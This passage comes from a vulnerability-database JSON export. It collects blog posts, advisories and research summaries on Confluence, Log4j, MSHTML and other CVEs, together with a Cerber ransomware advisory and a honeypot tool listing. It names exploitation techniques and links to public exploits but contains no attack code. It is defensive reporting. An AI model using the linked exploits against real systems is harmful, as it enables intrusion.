with VMDR 2.0. For example, a zero-touch automation job can be created to patch non-mission critical assets that will automatically execute as soon as a new vulnerability with a Qualys Detection Score &gt;90 is detected.\n\nIntegrated Patch Management is Simply Faster. On average, organizations that use Qualys VMDR + Patch Management remediate vulnerabilities 35% faster than organizations that use separate tools. Even better, with some vulnerabilities the difference can be 63% faster with a combined solution.\n\n_I agree that the focus of the VM should be on Remediation and it&#x27;s good that Qualys is pushing this topic. Is there enough new features to call this update VMDR 2.0? I don&#x27;t think so yet. It seems that if Remediation were fully automated for 100% of the hosts (which requires a fundamentally different approach to functional testing after the patch), then it would be 2.0. But marketers of Qualys know better._\n\n##  &quot;Modern IT Security Teams\u2019 Inevitable Need for Advanced Vulnerability Management&quot; by [Threatpost](<https://threatpost.com/modern-it-security-teams-inevitable-need-for-advanced-vulnerability-management/180018/>) (sponsored by Secpod)\n\nToday\u2019s modern attack surface needs a next-gen, advanced vulnerability management approach to deal with the complex, ever-evolving attack surfaces and to curb cyberattacks. Why Conventional Vulnerability Management is not the Best-fit for Modern Security Landscape\n\n 1. Vulnerabilities beyond CVEs are overlooked. Numerous security risks exist like a poorly configured setting, asset exposures, deviation in security controls, missing security patches, and security posture anomalies.\n 2. Lack of integrated remediation controls. Most of the traditional vulnerability management tools in the market do not come with integrated patching to remediate vulnerabilities. Conventional vulnerability management solutions rely on multiple tools to execute each step, making it hard for IT security teams.\n 3. Siloed Interfaces and Multiple-point Solutions Approach. Conventional vulnerability management solutions rely on multiple tools to execute each step, making it hard for IT security teams.\n 4. Manual Methods and Repetitive Processes. Traditional Vulnerability management tools are still not fully automated.\n\n_And to overcome these issues, you need Advanced Vulnerability Management from Secpod. In general, the list of cons looks fair, and the fact that they pay attention to vulnerabilities in addition to CVEs seems to me very correct._\n\n# de-Westernization of IT\n\nI have nothing against people or companies from Western countries. According to Google analytics, the majority of visitors to my [avleonov.com](<http://avleonov.com>) blog are actually from the US (then India, China, and Russia). However, that&#x27;s how it goes. Some companies stop working in Russia because of the sanctions. And Russian information security specialists should take into account these risks, mitigate them and warn colleagues who may also face these problems.\n\nLast week there was news that SAP and Microsoft will block Russian companies&#x27; access to software updates, including security updates, in August. For some reason, the news was published in Bloomberg without reference to the source.\n\n> &quot;It&#x27;s not just industry that&#x27;s affected. SAP SE and Microsoft Corp. are due to stop updates and services for Russian companies in August, leaving businesses and government services that rely on their software potentially vulnerable to security breaches and viruses.&quot;\n\nSome time later, this paragraph was rewritten. The mention of August was removed. Unfortunately, the fact that the leading Western media are spreading propaganda and rumors is no longer surprising. I do not even want to give a link to the article, whoever is interested can google it on their own.\n\nHowever, what if this really happens? What if we can no longer use WSUS and SCCM to update the Windows infrastructure? And even more, if we get some malicious functionality in the updates, which will be activated over time. Unfortunately, what once seemed like a minor risk and paranoia is now becoming more than real. Therefore, we need to think in advance about network isolation, alternative ways to update the Windows infrastructure, implement control over backups, implement information security tools that could compensate for the lack of patches to some extent. And most importantly, we need to quickly reduce dependence on the software of unstable vendors. And this is now relevant not only for Russia, but also for the BRICS countries and other countries that are already under US sanctions or may potentially face them.\n\n* * *\n\nI also finally decided to launch a Russian-language telegram channel [&quot;\u0423\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438 \u0438 \u043f\u0440\u043e\u0447\u0435\u0435&quot; @avleonovrus](<https://t.me/avleonovrus>). I think it will be updated a little more often, and there will be more reactions to our local Russian topics. Therefore, those who are interested, subscribe.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-06T12:13:56", "type": "avleonov", "title": "Vulnerability Management news and publications #1", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4034", "CVE-2022-26134"], "modified": "2022-07-06T12:13:56", "id": "AVLEONOV:E820C062BC9959711E1D1152D8848072", "href": "https://avleonov.com/2022/07/06/vulnerability-management-news-and-publications-1/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:43:30", "description": "Hello everyone! This time, let&#x27;s talk about recent vulnerabilities. I&#x27;ll start with Microsoft Patch Tuesday for September 2021. I created a report using my Vulristics tool. You can see [the full report here](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_september2021_report_avleonov_comments.html>).\n\nThe most interesting thing about the September Patch Tuesday is that the top 3 VM vendors ignored almost all RCEs in their reviews. However, there were interesting RCEs in the Office products. And what is most unforgivable is that they did not mention CVE-2021-38647 RCE in OMI - Open Management Infrastructure. Only ZDI wrote about this.\n\n## Microsoft Patch Tuesday September 2021\n\n### OMIGOD\n\n[Dubbed \u201cOMIGOD\u201d by researchers at Wiz.io](<https://www.infosecurity-magazine.com/news/microsoft-fixes-omigod-mshtml/>), the bugs could enable a remote attacker to gain root access to Linux virtual machines running on Azure. \u201cWe conservatively estimate that thousands of Azure customers and millions of endpoints are affected. In a small sample of Azure tenants we analyzed, over 65% were unknowingly at risk,\u201d the firm warned. \n\nSo, OMIGOD RCEs and EOPs with detected exploitation in the wild are in the Vulristics TOP. What else?\n\n### Chrome/Chromium/Edge RCE\n\nAn exploitation in the wild has been seen for Chrome/Chromium/Edge vulnerability CVE-2021-30632. Still no comments from the VM vendors, only from ZDI.\n\n### WLAN AutoConfig RCE\n\nOnly Qualys and ZDI mentioned CVE-2021-36965 Remote Code Execution in Windows WLAN AutoConfig Service. &quot;This would be highly useful in a coffee shop scenario where multiple people are using an unsecured WiFi network.&quot;\n\nAlso note several EOPs in Windows Kernel, Windows Common Log File System Driver and Windows Print Spooler.\n\n### MSHTML RCE\n\nBut of course, people were mostly waiting for fixes for a vulnerability that wasn&#x27;t released on Patch Tuesday, but a week ago. However, the updates only became available on September 14th. It is CVE-2021-40444 Microsoft MSHTML Remote Code Execution Vulnerability. &quot;\u0410 critical zero-day RCE vulnerability in Microsoft\u2019s MSHTML (Trident) engine that was exploited in the wild in limited, targeted attacks&quot;. &quot;To exploit this vulnerability, an attacker would need to create a specially crafted Microsoft Office document containing a malicious ActiveX control&quot;. Well, people are saying that ActiveX is not being used in new exploits for this vulnerability. This is serious, consider this in your anti-phishing programs and, of course, install patches.\n\n## Non-Microsoft vulnerabilities\n\nI would also like to say a few words about [other recent non-Microsoft vulnerabilities](<https://avleonov.com/vulristics_reports/september_2021_other_report_avleonov_comments.html>).\n\n### Confluence RCE\n\nI would like to mention the massively exploited CVE-2021-26084 Confluence RCE. A week passed between the release of the newsletter and the public exploit. If your organization has Confluence, keep an eye on it and never make it available at the perimeter of your network.\n\n### Ghostscript RCE\n\nAlso, the &quot;[Ghostscript provider Artifex Software released a security advisory](<https://www.jpcert.or.jp/english/at/2021/at210039.html>) regarding a vulnerability (CVE-2021-3781) that allows arbitrary command execution in Ghostscript. On a server running Ghostscript, an attacker may execute arbitrary commands by processing content that exploits this vulnerability&quot;. There is a [public exploit](<https://github.com/duc-nt/RCE-0-day-for-GhostScript-9.50>) for this vulnerability. Ask your developers if they use it to process SVG files.\n\n### Pegasus FORCEDENTRY macOS RCE\n\nAnd finally the RCE CVE-2021-30860 FORCEDENTRY vulnerability that was used in Pegasus spyware. The exploit that was spotted in the wild relies on malicious PDF files. The vulnerability became famous mainly because of iPhone attacks, but t[here are also patches for macOS Big Sur 11.6 and 2021-005 Catalina](<https://nakedsecurity.sophos.com/2021/09/14/apple-products-vulnerable-to-forcedentry-zero-day-attack-patch-now/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-18T23:22:00", "type": "avleonov", "title": "Security News: Microsoft Patch Tuesday September 2021, OMIGOD, MSHTML RCE, Confluence RCE, Ghostscript RCE, FORCEDENTRY Pegasus", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-30632", "CVE-2021-30860", "CVE-2021-36965", "CVE-2021-3781", "CVE-2021-38647", "CVE-2021-40444"], "modified": "2021-09-18T23:22:00", "id": "AVLEONOV:5945665DFA613F7707360C10CED8C916", "href": "https://avleonov.com/2021/09/19/security-news-microsoft-patch-tuesday-september-2021-omigod-mshtml-rce-confluence-rce-ghostscript-rce-forcedentry-pegasus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2022-06-14T17:20:43", "description": "[](<https://blogger.googleusercontent.com/img/a/AVvXsEhvJYSxBzvhziiqnNQMt1sVNIxlGDPxGaEDU73ligxfwzMzbXBi3yU8ypWCvQXp4yv7swHFon8H2aJCrn8HmJ8P_U1VRKcyPGulS3ckJLMWG9BozW5mcPC4jFdBmj9GCHuwx1YkvX_tI6PP7DHV1cHwoJnI1zhRwdnEHR4gHpUl8wsRJXX2MsN1_rv7>)\n\n \n\n\nConfluencePot is a simple [honeypot](<https://www.kitploit.com/search/label/HoneyPot> \"honeypot\" ) for the Atlassian Confluence unauthenticated and remote OGNL [injection](<https://www.kitploit.com/search/label/Injection> \"injection\" ) [vulnerability](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) ([CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134> \"CVE-2022-26134\" )).\n\n \n\n\n## About the vulnerability\n\nYou can find the official advisory by Atlassian to this vulerability [here](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html> \"here\" ). For details about the inner workings and [exploits](<https://www.kitploit.com/search/label/Exploits> \"exploits\" ) in the wild you should refer to the reports by [Rapid7](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/> \"Rapid7\" ) and [Cloudflare](<https://blog.cloudflare.com/cloudflare-observations-of-confluence-zero-day-cve-2022-26134/> \"Cloudflare\" ). Affected but not yet patched systems should be deemed **compromised** until further investigation.\n\n## About the tool\n\nConfluencePot is written in Golang and implements its own HTTPS server to minimize the overall attack surface. To make it appear like a legit Confluence instance it returns a bare-bones version of a Confluence landing page. Log output is written to stdout and a log file on disk. ConfluencePot **DOES NOT** allow attackers to execute commands/code on your machine, it only logs requests and returns a bogus response.\n\n### Building &amp; Running it\n\nYou need a recent version of Golang to run/build confluencePot and the appropriate privileges to bind to port 443. We recommend to execute it in a tmux session for easier handling. To run ConfluencePot you either need to create a self-signed TLS certificate with _openssl_ or request one from e.g. _Let's Encrypt_.\n \n \n go build confluencePot.go \n ./confluencePot \n \n\n## Testing and Issues\n\nConfluencePot was tested using the public exploit by [Nwqda](<https://github.com/Nwqda/CVE-2022-26134> \"Nwqda\" ), which seems to be the most used variant in the wild at the time of writing. If you find anything wrong with confluencePot please feel free to open an issue or send us a pull request.\n\nFollow us on [Twitter](<https://www.kitploit.com/search/label/Twitter> \"Twitter\" ) \\--&gt; [@SI_FalconTeam](<https://twitter.com/SI_FalconTeam> \"@SI_FalconTeam\" ) &lt;\\-- to stay up to date with our latest research. Stay safe!\n\n \n \n\n\n**[Download confluencePot](<https://github.com/SIFalcon/confluencePot> \"Download confluencePot\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-13T12:30:00", "type": "kitploit", "title": "confluencePot - Simple Honeypot For Atlassian Confluence (CVE-2022-26134)", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2613", "CVE-2022-26134"], "modified": "2022-06-13T12:30:00", "id": "KITPLOIT:3043339745958474082", "href": "http://www.kitploit.com/2022/06/confluencepot-simple-honeypot-for.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2021-12-14T15:20:51", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/12/Cerber-targeting-organizations-with-publicly_TA202158.pdf>)[](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F11%2FMicrosoft-could-not-patch-this-vulnerability_TA202150-1.pdf&embedded=true&chrome=false&dov=1> \"View this pdf file\" )\n\nCerber, ransomware that mysteriously vanished in 2019, has reappeared with a new encryption. The new cerber includes fresh source code and makes use of the new library Crypto+++, whereas the previous form made use of Windows CryptoAPI libraries.\n\nCerber is utilizing the following two vulnerabilities: -CVE-2021-26084: a remote code execution vulnerability that allows an attacker to execute arbitrary code in Atlassian Confluence Servers and Datacenters versions 6.13.22, 6.14.0-7.4.10, 7.5.0-7.11.5, 7.12.0-7.12.4. It has been fixed in versions 6.13.23, 7.4.11, 7.11.6, and 7.12.5. -CVE-2021-22205: GitHub Gitlab community and enterprise versions 11.9.0-13.8 are affected by a command execution vulnerability that can be exploited by uploading an image that runs via the ExifTool of GitLab Workhorse and achieving remote code execution via a specially designed file. It has been fixed in version 13.9.\n\nThe new Cerber ransomware uses either of the two vulnerabilities mentioned above and then enters victims&#x27; systems and encrypts their files. Cerber ransomware places the ransom note in the file **__$$RECOVERY_README$$__.html**, and all the encrypted files have an extension of .locked.\n\nOrganizations can patch both vulnerabilities by upgrading their systems to fixed versions.\n\nThe TTP&#x27;s used by **Cerber** includes:\n\nTA0002 - Execution\n\nT1059 - Command and Scripting Interpreter\n\nT1059.003 - Command and Scripting Interpreter: Windows Command Shell\n\nTA0007 - Discovery\n\nT1012 - Query Registry\n\nT1082 - System Information Discovery\n\n#### Vulnerability Details\n\n\n\n#### Indicators of Compromise(IoCs)\n\n\n\n#### Patch Links\n\n<https://jira.atlassian.com/browse/CONFSERVER-67940>\n\n#### References\n\n<https://gitlab.com/gitlab-org/gitlab/-/issues/327121>\n\n<https://packetstormsecurity.com/files/164768/GitLab-Unauthenticated-Remote-ExifTool-Command-Injection.html>\n\n<https://packetstormsecurity.com/files/164013/Confluence-Server-7.12.4-OGNL-Injection-Remote-Code-Execution.html>\n\n<https://otx.alienvault.com/pulse/61af78ee529faac40b2de15e/related>\n\n<https://app.any.run/tasks/c59f562e-4a61-459c-b0a3-9890c412b0ea/>\n\n<https://www.bleepingcomputer.com/news/security/new-cerber-ransomware-targets-confluence-and-gitlab-servers/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T13:50:15", "type": "hivepro", "title": "Cerber targeting organizations with publicly available exploits", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205", "CVE-2021-26084"], "modified": "2021-12-14T13:50:15", "id": "HIVEPRO:E9C63D0D70D3232F21940B33FC205340", "href": "https://www.hivepro.com/cerber-targeting-organizations-with-publicly-available-exploits/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "googleprojectzero": [{"lastseen": "2022-06-30T13:56:58", "description": "Posted by Maddie Stone, Google Project Zero\n\nThis blog post is an overview of a talk, \u201c 0-day In-the-Wild Exploitation in 2022\u2026so far\u201d, that I gave at the FIRST conference in June 2022. The slides are available [here](<https://github.com/maddiestone/ConPresentations/blob/master/FIRST2022.2022_0days_so_far.pdf>).\n\nFor the last three years, we\u2019ve published annual year-in-review reports of 0-days found exploited in the wild. The most recent of these reports is the [2021 Year in Review report](<https://googleprojectzero.blogspot.com/2022/04/the-more-you-know-more-you-know-you.html>), which we published just a few months ago in April. While we plan to stick with that annual cadence, we\u2019re publishing a little bonus report today looking at the in-the-wild 0-days detected and disclosed in the first half of 2022. \n\nAs of June 15, 2022, there have been 18 0-days detected and disclosed as exploited in-the-wild in 2022. When we analyzed those 0-days, we found that at least nine of the 0-days are variants of previously patched vulnerabilities. At least half of the 0-days we\u2019ve seen in the first six months of 2022 could have been prevented with more comprehensive patching and regression tests. On top of that, four of the 2022 0-days are variants of 2021 in-the-wild 0-days. Just 12 months from the original in-the-wild 0-day being patched, attackers came back with a variant of the original bug. \n\nProduct\n\n| \n\n2022 ITW 0-day\n\n| \n\nVariant \n \n---|---|--- \n \nWindows win32k\n\n| \n\n[CVE-2022-21882](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-21882.html>)\n\n| \n\n[CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) (2021 itw) \n \niOS IOMobileFrameBuffer\n\n| \n\n[CVE-2022-22587](<https://support.apple.com/en-us/HT213053>)\n\n| \n\n[CVE-2021-30983](<https://googleprojectzero.blogspot.com/2022/06/curious-case-carrier-app.html>) (2021 itw) \n \nWindows\n\n| \n\n[CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) (\u201cFollina\u201d)\n\n| \n\n[CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) (2021 itw) \n \nChromium property access interceptors\n\n| \n\n[CVE-2022-1096](<https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html>)\n\n| \n\n[CVE-2016-5128](<https://bugs.chromium.org/p/chromium/issues/detail?id=619166>) [CVE-2021-30551](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30551.html>) (2021 itw) [CVE-2022-1232](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2280>) (Addresses incomplete CVE-2022-1096 fix) \n \nChromium v8\n\n| \n\n[CVE-2022-1364](<https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_14.html>)\n\n| \n\n[CVE-2021-21195](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_30.html>) \n \nWebKit\n\n| \n\n[CVE-2022-22620](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-22620.html>) (\u201cZombie\u201d)\n\n| \n\n[Bug was originally fixed in 2013, patch was regressed in 2016](<https://googleprojectzero.blogspot.com/2022/06/an-autopsy-on-zombie-in-wild-0-day.html>) \n \nGoogle Pixel\n\n| \n\n[CVE-2021-39793](<https://source.android.com/security/bulletin/pixel/2022-03-01>)*\n\n* While this CVE says 2021, the bug was patched and disclosed in 2022\n\n| \n\n[Linux same bug in a different subsystem](<https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cd5297b0855f17c8b4e3ef1d20c6a3656209c7b3>) \n \nAtlassian Confluence\n\n| \n\n[CVE-2022-26134](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>)\n\n| \n\n[CVE-2021-26084](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) \n \nWindows\n\n| \n\n[CVE-2022-26925](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26925>) (\u201cPetitPotam\u201d)\n\n| \n\n[CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>) (Patch regressed) \n \nSo, what does this mean?\n\nWhen people think of 0-day exploits, they often think that these exploits are so technologically advanced that there\u2019s no hope to catch and prevent them. The data paints a different picture. At least half of the 0-days we\u2019ve seen so far this year are closely related to bugs we\u2019ve seen before. Our conclusion and findings in the [2020 year-in-review report](<https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html>) were very similar.\n\nMany of the 2022 in-the-wild 0-days are due to the previous vulnerability not being fully patched. In the case of the Windows win32k and the Chromium property access interceptor bugs, the execution flow that the proof-of-concept exploits took were patched, but the root cause issue was not addressed: attackers were able to come back and trigger the original vulnerability through a different path. And in the case of the WebKit and Windows PetitPotam issues, the original vulnerability had previously been patched, but at some point regressed so that attackers could exploit the same vulnerability again. In the iOS IOMobileFrameBuffer bug, a buffer overflow was addressed by checking that a size was less than a certain number, but it didn\u2019t check a minimum bound on that size. For more detailed explanations of three of the 0-days and how they relate to their variants, please see the [slides from the talk](<https://github.com/maddiestone/ConPresentations/blob/master/FIRST2022.2022_0days_so_far.pdf>).\n\nWhen 0-day exploits are detected in-the-wild, it\u2019s the failure case for an attacker. It\u2019s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can\u2019t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they\u2019re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that effectively, we need correct and comprehensive fixes.\n\nThis is not to minimize the challenges faced by security teams responsible for responding to vulnerability reports. As we said in our 2020 year in review report: \n\nBeing able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension. While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done. \n\nExactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.\n\nPractically, some of the following efforts can help ensure bugs are correctly and comprehensively fixed. Project Zero plans to continue to help with the following efforts, but we hope and encourage platform security teams and other independent security researchers to invest in these types of analyses as well:\n\n * Root cause analysis\n\nUnderstanding the underlying vulnerability that is being exploited. Also tries to understand how that vulnerability may have been introduced. Performing a root cause analysis can help ensure that a fix is addressing the underlying vulnerability and not just breaking the proof-of-concept. Root cause analysis is generally a pre-requisite for successful variant and patch analysis.\n\n * Variant analysis\n\nLooking for other vulnerabilities similar to the reported vulnerability. This can involve looking for the same bug pattern elsewhere, more thoroughly auditing the component that contained the vulnerability, modifying fuzzers to understand why they didn\u2019t find the vulnerability previously, etc. Most researchers find more than one vulnerability at the same time. By finding and fixing the related variants, attackers are not able to simply \u201cplug and play\u201d with a new vulnerability once the original is patched.\n\n * Patch analysis\n\nAnalyzing the proposed (or released) patch for completeness compared to the root cause vulnerability. I encourage vendors to share how they plan to address the vulnerability with the vulnerability reporter early so the reporter can analyze whether the patch comprehensively addresses the root cause of the vulnerability, alongside the vendor\u2019s own internal analysis.\n\n * Exploit technique analysis\n\nUnderstanding the primitive gained from the vulnerability and how it\u2019s being used. While it\u2019s generally industry-standard to patch vulnerabilities, mitigating exploit techniques doesn\u2019t happen as frequently. While not every exploit technique will always be able to be mitigated, the hope is that it will become the default rather than the exception. Exploit samples will need to be shared more readily in order for vendors and security researchers to be able to perform exploit technique analysis.\n\nTransparently sharing these analyses helps the industry as a whole as well. We publish our analyses at [this repository](<https://googleprojectzero.github.io/0days-in-the-wild/rca.html>). We encourage vendors and others to publish theirs as well. This allows developers and security professionals to better understand what the attackers already know about these bugs, which hopefully leads to even better solutions and security overall. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-30T00:00:00", "type": "googleprojectzero", "title": "\n2022 0-day In-the-Wild Exploitation\u2026so far\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5128", "CVE-2021-1732", "CVE-2021-21195", "CVE-2021-26084", "CVE-2021-30551", "CVE-2021-30983", "CVE-2021-36942", "CVE-2021-39793", "CVE-2021-40444", "CVE-2022-1096", "CVE-2022-1232", "CVE-2022-1364", "CVE-2022-21882", "CVE-2022-22587", "CVE-2022-22620", "CVE-2022-26134", "CVE-2022-26925", "CVE-2022-30190"], "modified": "2022-06-30T00:00:00", "id": "GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA", "href": "https://googleprojectzero.blogspot.com/2022/06/2022-0-day-in-wild-exploitationso-far.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2022-01-19T21:27:16", "description": "**_January 10, 2022 recap \u2013_**_ The Log4j vulnerabilities represent a complex and high-risk situation for companies across the globe. This open-source component is widely used across many suppliers\u2019 software and services. By nature of Log4j being a component, the vulnerabilities affect not only applications that use vulnerable libraries, but also any services that use these applications, so customers may not readily know how widespread the issue is in their environment. Customers are encouraged to utilize scripts and scanning tools to assess their risk and impact. Microsoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries (like nation-state actors) and commodity attackers alike have been observed taking advantage of these vulnerabilities. There is high potential for the expanded use of the vulnerabilities._\n\n_In January, we started seeing attackers taking advantage of the vulnerabilities in internet-facing systems, eventually deploying ransomware._ _We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks. Organizations may not realize their environments may already be compromised. Microsoft recommends customers to do additional review of devices where vulnerable installations are discovered. At this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments. Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance._\n\n_**January 19, 2022 update** - We added new information about an unrelated vulnerability we discovered while investigating Log4j attacks._\n\nThe remote code execution (RCE) vulnerabilities in Apache Log4j 2 referred to as \u201cLog4Shell\u201d ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44832>)) has presented a new attack vector and gained broad attention due to its severity and potential for widespread exploitation. The majority of attacks we have observed so far have been mainly mass-scanning, coin mining, establishing remote shells, and red-team activity, but it\u2019s highly likely that attackers will continue adding exploits for these vulnerabilities to their toolkits.\n\nWith nation-state actors testing and implementing the exploit and known ransomware-associated access brokers using it, we highly recommend applying 